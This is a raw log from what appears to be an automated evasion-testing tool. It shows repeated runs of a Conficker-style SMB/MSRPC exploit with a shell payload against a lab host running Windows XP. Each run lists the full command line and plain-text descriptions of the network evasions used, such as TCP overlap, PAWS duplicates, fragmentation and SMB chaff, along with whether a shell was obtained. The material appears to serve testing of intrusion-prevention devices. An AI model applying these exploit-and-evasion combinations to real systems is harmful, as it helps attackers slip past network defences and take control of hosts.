- 2902 runs averaging 2.07 runs / second ; progress: 1399/432002015-06-07 23:42:49 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56654 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wpR2aE+gKxE --evasion=[smb_connect,end]smb_decoytrees,"6","1","8","random_msrpcreq" --evasion=[netbios_connect,smb_opentree]tcp_urgent,"3","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed wpR2aE+gKxH
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Add a zero urgent data byte to every 3 TCP segment.
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.114:56654 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 2910 runs averaging 2.07 runs / second ; progress: 1404/43200..........
- 2920 runs averaging 2.07 runs / second ; progress: 1409/43200.....
- 2925 runs averaging 2.07 runs / second ; progress: 1414/432002015-06-07 23:43:04 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37265 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=B3brkhsbOQY --evasion=[start,smb_connect]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[start,end]tcp_paws,"50%","161438852","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed B3brkhsbOQY
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161438852> and has shuffled original payload
- The following evasions are applied from stage start to smb_connect:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- Info: NetBIOS connection 10.62.90.111:37265 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 2934 runs averaging 2.07 runs / second ; progress: 1419/43200.....
- 2939 runs averaging 2.06 runs / second ; progress: 1424/43200....
- 2943 runs averaging 2.06 runs / second ; progress: 1429/43200...
- 2946 runs averaging 2.05 runs / second ; progress: 1434/43200......
- 2952 runs averaging 2.05 runs / second ; progress: 1439/43200.....
- 2957 runs averaging 2.05 runs / second ; progress: 1444/43200.....
- 2962 runs averaging 2.04 runs / second ; progress: 1449/43200..
- 2964 runs averaging 2.04 runs / second ; progress: 1454/43200
- 2964 runs averaging 2.03 runs / second ; progress: 1459/43200
- 2964 runs averaging 2.02 runs / second ; progress: 1464/43200...Pid 16867 timed out - killed
- 2015-06-07 23:43:56 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32831 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fbiRe0OqRqE --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1480","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed fbiRe0OqRqF
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP segments are set to overlap by 1480 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.115:32831 -> 10.35.1.207:445
- Terminated
- ...Pid 16964 timed out - killed
- 2015-06-07 23:43:58 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55313 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b5STQXcaaZU --evasion=[start,smb_opentree]ipv4_opt,"2","inc","random_alphanum" --evasion=[smb_connect,msrpc_bind]netbios_chaff,"8","empty_unspec|http_post|msrpc_req" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed b5STQXcaaZV
- The following evasions are applied from stage start to smb_opentree:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:55313 -> 10.35.1.207:445
- Terminated
- ....
- 2976 runs averaging 2.03 runs / second ; progress: 1469/43200........
- 2984 runs averaging 2.02 runs / second ; progress: 1474/43200......
- 2990 runs averaging 2.02 runs / second ; progress: 1479/43200
- 2990 runs averaging 2.01 runs / second ; progress: 1484/43200.....2015-06-07 23:44:17 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61219 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=st6VvQtY2WU --evasion=[netbios_connect,end]netbios_chaff,"50%","small_unspec" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","183712702","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed st6VvQtY2WW
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 183712702> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Add a random alphaurgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.115:61219 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 3000 runs averaging 2.01 runs / second ; progress: 1489/43200..
- 3002 runs averaging 2.01 runs / second ; progress: 1494/43200.....
- 3007 runs averaging 2.01 runs / second ; progress: 1499/43200.....
- 3012 runs averaging 2.00 runs / second ; progress: 1504/43200..........
- 3022 runs averaging 2.00 runs / second ; progress: 1509/43200....
- 3026 runs averaging 2.00 runs / second ; progress: 1514/43200Pid 17706 timed out - killed
- 2015-06-07 23:44:48 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50332 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=baHVccOAqg0 --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"2","empty_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed baHVccOAqg1
- The following evasions are applied from stage smb_openpipe to end:
- - Add a zero urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.112:50332 -> 10.35.1.207:445
- Terminated
- .
- 3028 runs averaging 1.99 runs / second ; progress: 1519/43200.......
- 3035 runs averaging 1.99 runs / second ; progress: 1524/43200.......2015-06-07 23:44:57 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20874 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bDJ7YWEAIoE --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"2","inc","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bDJ7YWEAIoF
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- Info: NetBIOS connection 10.62.90.112:20874 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ....
- 3047 runs averaging 1.99 runs / second ; progress: 1529/43200.........
- 3056 runs averaging 1.99 runs / second ; progress: 1534/43200......
- 3062 runs averaging 1.99 runs / second ; progress: 1539/43200....
- 3066 runs averaging 1.99 runs / second ; progress: 1544/43200..Pid 18133 timed out - killed
- 2015-06-07 23:45:15 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=gZv/c+PGmls --evasion=[msrpc_bind,end]smb_decoytrees,"2","6","900","random" --evasion=[netbios_connect,end]tcp_paws,"8","5","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed gZv/c+PGmlu
- The following evasions are applied from stage netbios_connect to end:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 900 random bytes.
- Info: NetBIOS connection 10.62.90.117:55741 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Terminated
- .......2015-06-07 23:45:19 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18357 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=HyiGiu1DZEU --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","1","6","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed HyiGiu1DZEU
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 6 bytes of MSRPC bind-like data.
- - SMB writes are segmented to contain at most 7 bytes of payload.
- Info: NetBIOS connection 10.62.90.115:18357 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .
- 3078 runs averaging 1.99 runs / second ; progress: 1549/43200.
- 3079 runs averaging 1.98 runs / second ; progress: 1554/43200....
- 3083 runs averaging 1.98 runs / second ; progress: 1559/43200..........
- 3093 runs averaging 1.98 runs / second ; progress: 1564/43200......2015-06-07 23:45:39 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41890 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=pFzCeVGUS4A --evasion=[start,netbios_connect]ipv4_frag,"1128" --evasion=[msrpc_bind,end]smb_decoytrees,"3","3","7","random_msrpcbind" --evasion=[smb_connect,end]tcp_overlap,"5","new","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed pFzCeVGUS4C
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 1128 bytes per fragment
- The following evasions are applied from stage smb_connect to end:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 3 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.115:41890 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 3100 runs averaging 1.98 runs / second ; progress: 1569/43200
- 3100 runs averaging 1.97 runs / second ; progress: 1574/43200..
- 3102 runs averaging 1.96 runs / second ; progress: 1579/43200.........
- 3111 runs averaging 1.96 runs / second ; progress: 1584/43200........
- 3119 runs averaging 1.96 runs / second ; progress: 1589/43200.......
- 3126 runs averaging 1.96 runs / second ; progress: 1594/43200.......
- 3133 runs averaging 1.96 runs / second ; progress: 1599/43200.....
- 3138 runs averaging 1.96 runs / second ; progress: 1604/43200.....
- 3143 runs averaging 1.95 runs / second ; progress: 1609/43200..........
- 3153 runs averaging 1.95 runs / second ; progress: 1614/43200..2015-06-07 23:46:25 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57851 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=AP1hGMDxKw4 --evasion=[netbios_connect,msrpc_req]ipv4_opt,"5","inc","shuffletcp" --evasion=[netbios_connect,end]tcp_paws,"3","137668711","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed AP1hGMDxKw4
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137668711> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.113:57851 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....Pid 19636 timed out - killed
- 2015-06-07 23:46:28 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50808 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Jkvm51PzYao --evasion=[smb_opentree,end]ipv4_frag,"1480" --evasion=[netbios_connect,end]ipv4_opt,"13","inc","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Jkvm51PzYao
- The following evasions are applied from stage netbios_connect to end:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage smb_opentree to end:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:50808 -> 10.35.1.207:445
- Terminated
- ..........
- 3172 runs averaging 1.96 runs / second ; progress: 1619/43200...............
- 3187 runs averaging 1.96 runs / second ; progress: 1625/43200...............
- 3202 runs averaging 1.96 runs / second ; progress: 1630/432002015-06-07 23:46:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42667 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=GOpIKjE2r4Y --evasion=[msrpc_bind,end]smb_decoytrees,"3","6","7","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_segvar,"4","65535" --verifydelay=1000 --payload=shell
- Info: Using random seed GOpIKjE2r4Y
- The following evasions are applied from stage msrpc_bind to end:
- - TCP packets are segmented to contain between 4 and 65535 bytes of payload.
- - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.115:42667 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 3212 runs averaging 1.96 runs / second ; progress: 1635/43200........
- 3220 runs averaging 1.96 runs / second ; progress: 1640/43200.............
- 3233 runs averaging 1.97 runs / second ; progress: 1645/43200............2015-06-07 23:46:59 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30995 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=eLhPcn+y9o4 --evasion=[start,end]tcp_paws,"21","122513006","shuffle30" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed eLhPcn+y9o5
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122513006> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:30995 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 3248 runs averaging 1.97 runs / second ; progress: 1650/43200..............
- 3262 runs averaging 1.97 runs / second ; progress: 1655/43200..............
- 3276 runs averaging 1.97 runs / second ; progress: 1660/43200...........
- 3287 runs averaging 1.97 runs / second ; progress: 1665/43200.......
- 3294 runs averaging 1.97 runs / second ; progress: 1670/43200...
- 3297 runs averaging 1.97 runs / second ; progress: 1675/43200.......
- 3304 runs averaging 1.97 runs / second ; progress: 1680/43200........
- 3312 runs averaging 1.97 runs / second ; progress: 1685/43200.....Pid 21182 timed out - killed
- 2015-06-07 23:47:38 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18119 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=nYRQiekFQ6c --evasion=[msrpc_bind,end]ipv4_opt,"75%","inc","zero" --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|small_unspec|http_get|http_post|msrpc_req" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed nYRQiekFQ6e
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has NULL bytes for payload
- Info: NetBIOS connection 10.62.90.118:18119 -> 10.35.1.207:445
- Terminated
- ..
- 3320 runs averaging 1.96 runs / second ; progress: 1690/43200Pid 21258 timed out - killed
- 2015-06-07 23:47:40 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44993 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=117gBcdU3HQ --evasion=[msrpc_bind,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 117gBcdU3HT
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.116:44993 -> 10.35.1.207:445
- Terminated
- .......2015-06-07 23:47:44 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39878 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=EQRt84k6lTQ --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"2","1","10","random_msrpcreq" --evasion=[smb_connect,end]smb_decoytrees,"2","2","8","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed EQRt84k6lTQ
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 10 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.115:39878 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 3330 runs averaging 1.96 runs / second ; progress: 1695/43200.........
- 3339 runs averaging 1.96 runs / second ; progress: 1700/43200..........
- 3349 runs averaging 1.96 runs / second ; progress: 1705/43200..........
- 3359 runs averaging 1.96 runs / second ; progress: 1710/43200Pid 21568 timed out - killed
- 2015-06-07 23:48:00 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35574 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b1eDRHpOWxU --evasion=[smb_opentree,msrpc_req]smb_chaff,"25%","write_flag","zero" --evasion=[start,msrpc_req]tcp_paws,"75%","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed b1eDRHpOWxV
- The following evasions are applied from stage start to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- Info: NetBIOS connection 10.62.90.119:35574 -> 10.35.1.207:445
- Terminated
- ......
- 3366 runs averaging 1.96 runs / second ; progress: 1715/43200.2015-06-07 23:48:06 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11004 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=4E57Ty3TjkE --evasion=[start,smb_opentree]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","134958172","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 4E57Ty3TjkH
- The following evasions are applied from stage start to smb_opentree:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 134958172> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:11004 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .........
- 3377 runs averaging 1.96 runs / second ; progress: 1720/43200...............
- 3392 runs averaging 1.97 runs / second ; progress: 1725/43200......................
- 3414 runs averaging 1.97 runs / second ; progress: 1730/43200.....Pid 21788 timed out - killed
- 2015-06-07 23:48:21 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60318 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=u0yyOW7fX0Q --evasion=[smb_connect,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed u0yyOW7fX0S
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage smb_openpipe to end:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.114:60318 -> 10.35.1.207:445
- Terminated
- ..............
- 3434 runs averaging 1.98 runs / second ; progress: 1735/43200......
- 3440 runs averaging 1.98 runs / second ; progress: 1740/43200......
- 3446 runs averaging 1.97 runs / second ; progress: 1745/43200..........
- 3456 runs averaging 1.97 runs / second ; progress: 1750/43200.....................
- 3477 runs averaging 1.98 runs / second ; progress: 1755/43200.......
- 3484 runs averaging 1.98 runs / second ; progress: 1760/43200....2015-06-07 23:48:55 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25246 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=JW20JsGXHvY --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcreq" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed JW20JsGXHvY
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.115:25246 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 3489 runs averaging 1.98 runs / second ; progress: 1766/43200.........
- 3498 runs averaging 1.98 runs / second ; progress: 1771/432002015-06-07 23:49:00 INFO
- Success. (10.62.90.110):
